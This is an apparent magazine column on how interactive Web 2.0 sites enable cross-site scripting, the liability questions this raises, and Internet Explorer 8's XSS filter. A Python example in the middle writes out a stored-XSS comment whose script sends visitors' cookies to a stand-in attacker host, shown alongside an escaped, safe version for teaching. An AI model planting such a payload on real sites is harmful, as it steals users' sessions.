Although Web 2.0 technology allows us to do things on the Internet that were never before possible, a certain amount of risk comes into play any time a site offers a high degree of interactivity. In fact, there have been several documented cases of people using otherwise legitimate Web 2.0 sites as a mechanism for spreading malware.
Brien M. Posey
The reason why Web 2.0 presents such a security risk has to do with a site's level of interactivity. Websites such as YouTube and MySpace allow users to upload files and post other types of content, and attackers have been known to use that user-supplied content to perform cross-site scripting (XSS) attacks.
This type of attack involves either uploading malicious files to a Web 2.0 site or embedding malicious JavaScript or Ajax code within text input fields. When other visitors to the site reach a page containing a malicious script, or download malicious files from the site to their computers, their machines become infected.
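To make the mechanism concrete, here is a minimal sketch of a stored XSS attack of the kind described above. The comment text and the page-rendering functions are entirely hypothetical, not taken from any real site; the point is simply that unescaped user content becomes executable script in every later visitor's browser, while output encoding renders it inert.

```python
from html import escape

# Hypothetical comment a malicious user submits to an interactive site.
malicious_comment = (
    '<script>document.location='
    '"http://evil.example/steal?c=" + document.cookie</script>'
)

def render_comment_unsafely(comment):
    """Naive page builder: interpolates user content directly into HTML,
    so any embedded <script> tag will execute in visitors' browsers."""
    return "<div class='comment'>%s</div>" % comment

def render_comment_safely(comment):
    """Same builder with output encoding: the script arrives as plain text."""
    return "<div class='comment'>%s</div>" % escape(comment)

unsafe_page = render_comment_unsafely(malicious_comment)
safe_page = render_comment_safely(malicious_comment)

assert "<script>" in unsafe_page      # a browser would run this
assert "<script>" not in safe_page    # rendered as harmless text instead
```

The vulnerable and safe versions differ by a single escaping call, which is exactly why this class of bug is so easy to ship by accident.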
Certainly, this is a major security threat, but let's move beyond the obvious. For starters, most security software treats well-known Web 2.0 sites as being completely safe. Of course the site itself is safe, but the content posted on the site by other users may not be. This means users may be exposed to malware on sites that have been classified as safe.
Another problem with the malicious use of otherwise benign websites is the legal ramifications. I don't think the legal issues have completely shaken themselves out yet, but there has been a lot of speculation lately that a website owner could potentially be held liable for the malicious use of his site, even if there is nothing malicious about the site itself. This speculation is based on the idea that a site owner could potentially be found to be negligent in his security practices, thereby allowing the exploit to happen.
Of course the legal issues work both ways. There are plenty of security companies that blacklist and whitelist websites based on whether or not those sites are safe. Such a company would face a tremendous backlash if it ever blacklisted a site such as MySpace or classified it as unsafe, but if a site it had whitelisted did happen to contain malicious content, it might face legal action from affected users.
Ultimately, the only way to really address cross-site scripting attacks is for Web developers to bring security to the forefront of every design decision. Essentially, Web applications need to be coded so all user input is treated as "evil" until proven otherwise. This means Web developers must initially assume that all input is malicious, and then parse the input in a way that reliably separates the good input from the bad.
The problem with this is that not all Web developers can be trusted to protect users against malicious use of an otherwise legitimate site. Because you can never really tell for sure whether a site is being exploited by those with malicious intent, Microsoft is also taking steps to do something about cross-site scripting vulnerabilities. Internet Explorer 8 is slated to be the first version of the browser with a built-in cross-site scripting filter.
Although Internet Explorer 8 has been in beta testing for quite some time now, it remains to be seen how well Microsoft's new cross-site scripting filter will work when the browser is finally released. Microsoft is walking a fine line in that it must design the filter in a way that provides adequate protection, without breaking Web 2.0 applications or pestering users with constant nag screens.
Anytime a new technology emerges, there are certain unforeseen problems that initially come along with it, and the same goes for Web 2.0. I think that as browser security and Web application coding practices improve, though, cross-site scripting attacks will become less of a problem.
Brien M. Posey, MCSE, is a Microsoft Most Valuable Professional for his work with Windows 2000 Server and IIS. He has served as CIO for a nationwide chain of hospitals and was once in charge of IT security for Fort Knox. Write to him at firstname.lastname@example.org.